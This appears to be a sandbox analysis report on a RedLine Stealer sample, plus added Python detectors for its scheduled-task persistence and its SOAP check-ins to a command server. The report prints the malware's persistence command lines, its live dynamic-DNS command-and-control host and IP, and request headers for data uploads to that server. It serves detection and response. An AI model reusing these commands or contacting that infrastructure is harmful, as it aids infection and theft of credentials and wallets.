Windows Analysis Report
workalone.exe

Overview

General Information

Sample Name: workalone.exe
Analysis ID: 756291
MD5: 68f42f485ece93306bef1e4084d3052e
SHA1: c63f1a56d12a0acbf5e9a354d8a66c6e17af2309
SHA256: 5d526be000146cf9cf94f7ef6f4e86929d508e17ca483b03d4ecbd2d52e071c9
Tags: exe, RedLineStealer

Detection

RedLine
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Malicious sample detected (through community Yara rule)
Sigma detected: Schedule system process
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Tries to steal Crypto Currency Wallets
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Injects a PE file into a foreign process
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Drops PE files with benign system names
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file name differs from the original file name recorded in its version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Startup (process tree)

  • System is w10x64
  • workalone.exe (PID: 5836 cmdline: C:\Users\user\Desktop\workalone.exe MD5: 68F42F485ECE93306BEF1E4084D3052E)
    • workalone.exe (PID: 5956 cmdline: C:\Users\user\Desktop\workalone.exe MD5: 68F42F485ECE93306BEF1E4084D3052E)
      • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5972 cmdline: cmd" /c mkdir "C:\Users\user\AppData\Roaming\svchost MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6040 cmdline: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 6108 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f MD5: 15FF7D8324231381BAD48A052F85DF04)
    • cmd.exe (PID: 6080 cmdline: cmd" /c copy "C:\Users\user\Desktop\workalone.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
Malware configuration (RedLine, extracted from memory): {"C2 url": ["saleshor12.duckdns.org:46539"], "Bot Id": "cheat"}
Yara matches in the network capture

Source | Rule | Description | Author
  • dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
  • dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security

Yara matches in process memory dumps (8 entries in total; the remaining entries are not shown here)

Source | Rule | Description | Author | Strings
  • 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
  • 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
  • 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown
      0x133ca: $a4: get_ScannedWallets
      0x12228: $a5: get_ScanTelegram
      0x1304e: $a6: get_ScanGeckoBrowsersPaths
      0x10e6a: $a7: <Processes>k__BackingField
      0xed7c: $a8: <GetWindowsVersion>g__HKLM_GetString|11_0
      0x1079e: $a9: <ScanFTP>k__BackingField
  • 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
  • 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

Yara matches in unpacked PE files (15 entries in total; the remaining entries are not shown here)

Source | Rule | Description | Author | Strings
  • 1.0.workalone.exe.400000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
  • 1.0.workalone.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
  • 1.0.workalone.exe.400000.0.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
      0x1048a: $u7: RunPE
      0x13b41: $u8: DownloadAndEx
      0x9130: $pat14: , CommandLine:
      0x13079: $v2_1: ListOfProcesses
      0x1068b: $v2_2: get_ScanVPN
      0x1072e: $v2_2: get_ScanFTP
      0x1141e: $v2_2: get_ScanDiscord
      0x1240c: $v2_2: get_ScanSteam
      0x12428: $v2_2: get_ScanTelegram
      0x124ce: $v2_2: get_ScanScreen
      0x13216: $v2_2: get_ScanChromeBrowsersPaths
      0x1324e: $v2_2: get_ScanGeckoBrowsersPaths
      0x13509: $v2_2: get_ScanBrowsers
      0x135ca: $v2_2: get_ScannedWallets
      0x135f0: $v2_2: get_ScanWallets
      0x13610: $v2_3: GetArguments
      0x11cd9: $v2_4: VerifyUpdate
      0x165fe: $v2_4: VerifyUpdate
      0x139ca: $v2_5: VerifyScanRequest
      0x130c6: $v2_6: GetUpdates
      0x165df: $v2_6: GetUpdates
  • 1.0.workalone.exe.400000.0.unpack | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown
      0x135ca: $a4: get_ScannedWallets
      0x12428: $a5: get_ScanTelegram
      0x1324e: $a6: get_ScanGeckoBrowsersPaths
      0x1106a: $a7: <Processes>k__BackingField
      0xef7c: $a8: <GetWindowsVersion>g__HKLM_GetString|11_0
      0x1099e: $a9: <ScanFTP>k__BackingField
  • 0.2.workalone.exe.3a29170.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

Persistence and Installation Behavior

Sigma match (rule "Schedule system process", author: Joe Security), source: process started:
  Command / CommandLine / ProcessCommandLine: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
  CommandLine|base64offset|contains: (empty)
  Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\cmd.exe
  ProcessId: 6040, ProcessName: cmd.exe
  ParentImage / ParentCommandLine: C:\Users\user\Desktop\workalone.exe
  ParentProcessId: 5836, ParentProcessName: workalone.exe
No Snort rule has matched
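The persistence chain in the process tree (mkdir under %APPDATA%, copy of the sample to a svchost.exe look-alike path, and a schtasks watchdog that fires every minute) is straightforward to catch in process-creation telemetry. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it parses the schtasks /create arguments out of both the cmd.exe wrapper and the schtasks.exe event, and flags a task whose interval is a short /sc minute loop, whose action lives in a user-writable directory, or whose action file name mimics a core Windows binary outside \Windows; it also catches the cmd /c copy that plants the look-alike. The records are constructed from the command lines in this report using Sysmon Event ID 1 style field names; that field layout, the directory and system-binary lists and the 5-minute threshold are this example's assumptions.

```python
"""Flag RedLine-style scheduled-task persistence in process-creation telemetry.

Added example; this is not code from the Joe Sandbox report or from the sample.
The records below are constructed from the command lines in the report's
process tree, using Sysmon Event ID 1 style field names (ProcessId,
CommandLine); that field layout, the directory list, the system-binary name
list and the 5-minute watchdog threshold are this example's assumptions.
"""
import ntpath
import re

# Directories a standard user can write to. A task action living here is far
# more suspicious than one under Program Files or the Windows directory.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.I)

# Names of core Windows binaries. One of these outside %SystemRoot% is the
# "Drops PE files with benign system names" pattern the report flags.
SYSTEM_NAMES = {"svchost.exe", "conhost.exe", "csrss.exe", "lsass.exe", "winlogon.exe",
                "explorer.exe", "dllhost.exe", "rundll32.exe", "spoolsv.exe"}

# A /sc minute task with an interval this short is a watchdog that re-launches
# the payload, not a maintenance job.
MAX_WATCHDOG_MINUTES = 5

# Keep double-quoted spans together; Windows command lines have no escape character.
TOKEN = re.compile(r'"[^"]*"|\S+')


def tokenize(cmdline):
    """Split a Windows command line into arguments, dropping surrounding quotes."""
    return [t.strip('"').strip("'") for t in TOKEN.findall(cmdline)]


def parse_schtasks(cmdline):
    """Return the /sc, /mo, /tn and /tr values of a 'schtasks /create' command.

    Handles both the bare schtasks.exe event and the 'cmd /c schtasks ...'
    wrapper seen in the report. Returns None for anything else.
    """
    toks = tokenize(cmdline)
    low = [t.lower() for t in toks]
    starts = [i for i, t in enumerate(low) if ntpath.basename(t) in ("schtasks", "schtasks.exe")]
    if not starts or "/create" not in low[starts[0]:]:
        return None
    task = {}
    for i in range(starts[0], len(toks) - 1):
        if low[i] in ("/sc", "/mo", "/tn", "/tr"):
            task[low[i][1:]] = toks[i + 1]
    return task


def masquerades_system_binary(path):
    """True if the file name is a core Windows binary but the path is outside \\Windows\\."""
    return ntpath.basename(path).lower() in SYSTEM_NAMES and "\\windows\\" not in path.lower()


def analyze_task(task):
    """Return the reasons a parsed task looks like stealer persistence (empty if none)."""
    reasons = []
    target = task.get("tr", "")
    interval = task.get("mo", "1")
    if task.get("sc", "").lower() == "minute" and interval.isdigit() \
            and int(interval) <= MAX_WATCHDOG_MINUTES:
        reasons.append("re-launches every %s minute(s)" % interval)
    if USER_WRITABLE.search(target):
        reasons.append("task action is in a user-writable directory")
    if masquerades_system_binary(target):
        reasons.append("task action masquerades as a system binary")
    return reasons


def find_copy_masquerade(cmdline):
    """Return the destination of 'copy <src> <dst>' when <dst> mimics a system binary."""
    toks = tokenize(cmdline)
    low = [t.lower() for t in toks]
    if "copy" in low:
        i = low.index("copy")
        if i + 2 < len(toks) and masquerades_system_binary(toks[i + 2]):
            return toks[i + 2]
    return None


def scan_events(events):
    """Run both checks over process-creation records and return the findings."""
    findings = []
    for ev in events:
        task = parse_schtasks(ev["CommandLine"])
        if task:
            reasons = analyze_task(task)
            if reasons:
                findings.append({"pid": ev["ProcessId"], "task": task.get("tn"), "reasons": reasons})
        dst = find_copy_masquerade(ev["CommandLine"])
        if dst:
            findings.append({"pid": ev["ProcessId"], "task": None, "reasons": ["copies itself to " + dst]})
    return findings


# Constructed records: the first four reproduce the report's process tree, the
# last one is a benign control that must not be flagged.
SAMPLE_EVENTS = [
    {"ProcessId": 5972, "CommandLine": r'cmd" /c mkdir "C:\Users\user\AppData\Roaming\svchost'},
    {"ProcessId": 6040, "CommandLine": r'''"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f'''},
    {"ProcessId": 6108, "CommandLine": r'''schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f'''},
    {"ProcessId": 6080, "CommandLine": r'cmd" /c copy "C:\Users\user\Desktop\workalone.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe'},
    {"ProcessId": 7000, "CommandLine": r'schtasks /create /sc daily /st 03:00 /tn "NightlyBackup" /tr "C:\Program Files\Backup\backup.exe"'},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print("PID %d task=%s: %s" % (f["pid"], f["task"], "; ".join(f["reasons"])))
```

Killing the running process alone does not clean this up: the task re-launches %APPDATA%\svchost\svchost.exe within a minute, so the task ("schtasks /delete /tn "Nafifas" /f") has to go together with the file. The same checks run retrospectively over Sysmon or 4688 history find hosts where only the schtasks.exe event survived.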

AV Detection

Source: workalone.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Avira: detection malicious, Label: HEUR/AGEN.1235903
Source: workalone.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: RedLine {"C2 url": ["saleshor12.duckdns.org:46539"], "Bot Id": "cheat"}
Source: workalone.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: workalone.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: global traffic | TCP traffic: 85.208.136.178 ports 46539,3,4,5,6,9
Source: unknown | Network traffic detected: HTTP traffic between local ephemeral ports and remote port 46539 (12 flow records): 49685 -> 46539 (2), 46539 -> 49685 (4), 49687 -> 46539 (1), 46539 -> 49687 (2), 49688 -> 46539 (1), 46539 -> 49688 (2)
Source: Malware configuration extractor | URLs: saleshor12.duckdns.org:46539
Source: unknown | DNS query: name: saleshor12.duckdns.org
Source: Joe Sandbox View | ASN Name: CMCSUS CMCSUS
Source: global traffic | HTTP traffic detected: four SOAP POSTs to saleshor12.duckdns.org:46539. All share the request line "POST / HTTP/1.1" and the headers Content-Type: text/xml; charset=utf-8, Expect: 100-continue and Accept-Encoding: gzip, deflate, and none of them carries a User-Agent header:
    SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"        Content-Length: 137      Connection: Keep-Alive
    SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Content-Length: 144
    SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"      Content-Length: 1144458
    SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"          Content-Length: 1144450  Connection: Keep-Alive
Source: global traffic | TCP traffic: 192.168.2.3:49685 -> 85.208.136.178:46539
Source: workalone.exe, 00000001.00000003.385517483.0000000008C81000.00000004.00000800.00020000.00000000.sdmp; workalone.exe, 00000001.00000003.404595530.0000000008C91000.00000004.00000800.00020000.00000000.sdmp; workalone.exe, 00000001.00000003.404434533.0000000008C90000.00000004.00000800.00020000.00000000.sdmp | Strings found in binary or memory:
    http://ns.ado/1
    http://ns.adobe.c/g
    http://ns.adobe.cobj
Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp; workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmp | Strings found in binary or memory:
    http://saleshor12.duckdns.org
    http://tempuri.org/Endpoint/SetEnvironment
Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp | Strings found in binary or memory:
    http://saleshor12.duckdns.org:
    http://schemas.datacontract.org/2004/07/
    http://tempuri.org/Endpoint/SetEnviron
Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp; workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory:
    http://saleshor12.duckdns.org:46539
Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp | Strings found in binary or memory:
    http://saleshor12.duckdns.org:46539/
    http://schemas.xmlsoap.org/soap/actor/next
    http://schemas.xmlsoap.org/ws/2004/08/addressing
    http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    http://tempuri.org/0
    http://tempuri.org/Endpoint/CheckConnect
    http://tempuri.org/Endpoint/CheckConnectResponse
    http://tempuri.org/Endpoint/EnvironmentSettingsResponse
    http://tempuri.org/Endpoint/GetUpdatesResponse
    http://tempuri.org/Endpoint/SetEnvironmentResponse
    http://tempuri.org/Endpoint/VerifyUpdate
    http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp; workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory:
    http://tempuri.org/Endpoint/EnvironmentSettings
Source: workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmp; workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory:
    http://tempuri.org/Endpoint/GetUpdates
Source: workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp | Strings found in binary or memory:
    http://schemas.xmlsoap.org/soap/envelope/
    http://schemas.xmlsoap.org/soap/envelope/D
    http://tempuri.org/
    http://tempuri.org/t_
Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp; workalone.exe, 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Strings found in binary or memory (public IP-lookup services referenced by the stealer; the trailing fragments are most likely neighbouring strings run together by the extractor):
    https://api.ip.sb/geoip%USERPEnvironmentROFILE%
    https://api.ipify.orgcookies//settinString.Removeg
    https://ipinfo.io/ip%appdata%
Source: tmp1B56.tmp.1.dr | Strings found in binary or memory:
    https://ac.ecosia.org/autocomplete?q=
    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    https://duckduckgo.com/ac/?q=
    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp; workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp; tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.dr | Strings found in binary or memory (search-provider URLs of the kind stored in browser profile databases; they belong to the harvested browser data, not to the malware's own infrastructure):
    https://duckduckgo.com/chrome_newtab
    https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
    https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
    https://search.yahoo.com?fr=crmas_sfp
    https://search.yahoo.com?fr=crmas_sfpf
    https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown | HTTP traffic detected: POST / HTTP/1.1, Content-Type: text/xml; charset=utf-8, SOAPAction: "http://tempuri.org/Endpoint/CheckConnect", Host: saleshor12.duckdns.org:46539, Content-Length: 137, Expect: 100-continue, Accept-Encoding: gzip, deflate, Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: saleshor12.duckdns.org
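The four POSTs in this section are RedLine's check-in sequence over WCF basic HTTP. tempuri.org is the namespace WCF assigns when a developer sets none, so it turns up in legitimate software too; what identifies this family is the combination of the "Endpoint" contract with these operation names, the missing User-Agent, plain HTTP on a high port and a dynamic-DNS host, and the ~1.1 MB request bodies on SetEnvironment and GetUpdates are where the collected data leaves the host. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it parses raw HTTP request headers, scores each request on those indicators and collects the C2 host, port and operations from the requests it judges malicious. The first four requests are rebuilt from the headers listed above (bodies omitted); the fifth is a constructed benign WCF request. The dynamic-DNS suffix list, the common-port set, the upload-size threshold and the three-indicator verdict rule are this example's assumptions.

```python
"""Fingerprint RedLine's WCF/SOAP check-in traffic in captured HTTP requests.

Added example; not code from the Joe Sandbox report or from the sample. The
first four requests below are rebuilt from the request lines and headers the
report lists (bodies omitted); the fifth is a constructed benign control.
The dynamic-DNS suffix list, the "common port" set, the upload-size threshold
and the three-indicator verdict rule are this example's assumptions.
"""
import re

# Operation names on RedLine's "Endpoint" service contract, as seen in the
# report's SOAPAction headers and in-memory strings.
REDLINE_OPS = {"CheckConnect", "EnvironmentSettings", "SetEnvironment",
               "GetUpdates", "VerifyUpdate", "VerifyScanRequest"}
SOAP_ACTION = re.compile(r'^"?http://tempuri\.org/Endpoint/(\w+)"?$')
DYNDNS_SUFFIXES = (".duckdns.org", ".ddns.net", ".no-ip.org", ".hopto.org")  # assumption
COMMON_HTTP_PORTS = {80, 8080, 8000, 443}                                    # assumption
LARGE_UPLOAD = 256 * 1024   # bytes; the report's SetEnvironment body is ~1.1 MB


def parse_request(raw):
    """Parse the request line and headers of one HTTP/1.1 request; the body is ignored."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def host_port(headers):
    """Split the Host header into (name, port); plain HTTP defaults to port 80."""
    host = headers.get("host", "").lower()
    name, _, port = host.rpartition(":")
    if name and port.isdigit():
        return name, int(port)
    return host, 80


def indicators(req):
    """List the RedLine C2 indicators a request carries; empty means 'looks ordinary'."""
    h = req["headers"]
    found = []
    m = SOAP_ACTION.match(h.get("soapaction", ""))
    op = m.group(1) if m else None
    if op in REDLINE_OPS:
        found.append("SOAP operation %s on the RedLine 'Endpoint' contract" % op)
    if "user-agent" not in h:
        found.append("no User-Agent header")
    name, port = host_port(h)
    if port not in COMMON_HTTP_PORTS:
        found.append("plain HTTP on port %d" % port)
    if name.endswith(DYNDNS_SUFFIXES):
        found.append("dynamic-DNS host %s" % name)
    length = h.get("content-length", "0")
    if op and length.isdigit() and int(length) >= LARGE_UPLOAD:
        found.append("large SOAP upload (%s bytes)" % length)
    return found


def triage(raw_requests, min_indicators=3):
    """Return (verdicts, iocs): one verdict per request, plus the C2 host, port and
    operations collected from the requests judged malicious."""
    verdicts, iocs = [], {"hosts": set(), "ports": set(), "ops": []}
    for raw in raw_requests:
        req = parse_request(raw)
        found = indicators(req)
        malicious = len(found) >= min_indicators
        verdicts.append({"soapaction": req["headers"].get("soapaction"),
                         "malicious": malicious, "indicators": found})
        if malicious:
            name, port = host_port(req["headers"])
            iocs["hosts"].add(name)
            iocs["ports"].add(port)
            m = SOAP_ACTION.match(req["headers"].get("soapaction", ""))
            if m:
                iocs["ops"].append(m.group(1))
    return verdicts, iocs


def redline_post(action, length, keep_alive):
    """Rebuild one of the report's request headers (body omitted)."""
    hdrs = ["POST / HTTP/1.1",
            "Content-Type: text/xml; charset=utf-8",
            'SOAPAction: "http://tempuri.org/Endpoint/%s"' % action,
            "Host: saleshor12.duckdns.org:46539",
            "Content-Length: %d" % length,
            "Expect: 100-continue",
            "Accept-Encoding: gzip, deflate"]
    if keep_alive:
        hdrs.append("Connection: Keep-Alive")
    return "\r\n".join(hdrs) + "\r\n\r\n"


SAMPLE_REQUESTS = [
    redline_post("CheckConnect", 137, True),
    redline_post("EnvironmentSettings", 144, False),
    redline_post("SetEnvironment", 1144458, False),
    redline_post("GetUpdates", 1144450, True),
    # Constructed benign control: a WCF client that kept the default tempuri.org
    # namespace, but with a User-Agent, a normal port and a different contract.
    "POST /OrderService.svc HTTP/1.1\r\n"
    "Host: erp.example.com\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 4.0.30319)\r\n"
    'SOAPAction: "http://tempuri.org/IOrderService/GetOrder"\r\n'
    "Content-Type: text/xml; charset=utf-8\r\n"
    "Content-Length: 412\r\n\r\n",
]

if __name__ == "__main__":
    verdicts, iocs = triage(SAMPLE_REQUESTS)
    for v in verdicts:
        label = "MALICIOUS: " + "; ".join(v["indicators"]) if v["malicious"] else "ordinary"
        print(v["soapaction"], "->", label)
    print("C2:", sorted(iocs["hosts"]), sorted(iocs["ports"]), iocs["ops"])
```

The verdict threshold is deliberately not "tempuri.org present": the benign control scores zero even though it uses that namespace. Feeding the same function the requests from a proxy log or a PCAP export (one header block per request) gives the C2 host and port to block and the operation list to confirm the family.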

System Summary

Yara rule MALWARE_Win_RedLine (author = ditekSHen, description = Detects RedLine infostealer, snort2_sid = 920072-920073, snort3_sid = 920072-920073, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2) matched the unpacked PEs 1.0.workalone.exe.400000.0.unpack, 0.2.workalone.exe.3a29170.0.unpack, 0.2.workalone.exe.3a11340.1.unpack, 0.2.workalone.exe.3a29170.0.raw.unpack and 0.2.workalone.exe.3a11340.1.raw.unpack.
Yara rule Windows_Trojan_RedLineStealer_f54632eb (author = unknown, threat_name = Windows.Trojan.RedLineStealer, reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, scan_context = file, memory, license = Elastic License v2, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, creation_date = 2021-06-12, last_modified = 2021-08-23) matched:
    the same five unpacked PEs (1.0.workalone.exe.400000.0.unpack, 0.2.workalone.exe.3a29170.0.unpack, 0.2.workalone.exe.3a11340.1.unpack, 0.2.workalone.exe.3a29170.0.raw.unpack, 0.2.workalone.exe.3a11340.1.raw.unpack);
    the memory dumps 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp and 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp;
    the process memory strings of workalone.exe PID 5836 and workalone.exe PID 5956.
Source: workalone.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\workalone.exe | Code function: 1_2_054DDE10
Source: C:\Users\user\Desktop\workalone.exe | Code function: 1_2_054DD2F0
Source: C:\Users\user\Desktop\workalone.exe | Code function: 1_2_065E8440
Source: C:\Users\user\Desktop\workalone.exe | Code function: 1_2_065E8878
Source: C:\Users\user\Desktop\workalone.exe | Code function: 1_2_065E15A8
Source: C:\Users\user\Desktop\workalone.exe | Code function: 0_2_00F88220 CreateProcessAsUserA
Source: workalone.exe, 00000000.00000002.267079536.00000000029F1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameImplosions.exe4 vs workalone.exe
Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameImplosions.exe4 vs workalone.exe
                    Source: workalone.exe, 00000001.00000000.262909550.000000000041A000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs workalone.exe
                    Source: workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs workalone.exe
                    Source: workalone.exe, 00000001.00000002.410486785.00000000034BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs workalone.exe
                    Source: workalone.exe, 00000001.00000002.410486785.00000000034BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs workalone.exe
                    Source: workalone.exe, 00000001.00000002.410486785.00000000034BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #l,\\StringFileInfo\\040904B0\\OriginalFilename vs workalone.exe
                    Source: workalone.exe, 00000001.00000002.410486785.00000000034BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXE.MUID vs workalone.exe
                    Source: workalone.exe, 00000001.00000002.410486785.00000000034BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXED vs workalone.exe
                    Source: workalone.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: svchost.exe.7.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: workalone.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\workalone.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\workalone.exe C:\Users\user\Desktop\workalone.exe
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Users\user\Desktop\workalone.exe C:\Users\user\Desktop\workalone.exe
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\svchost
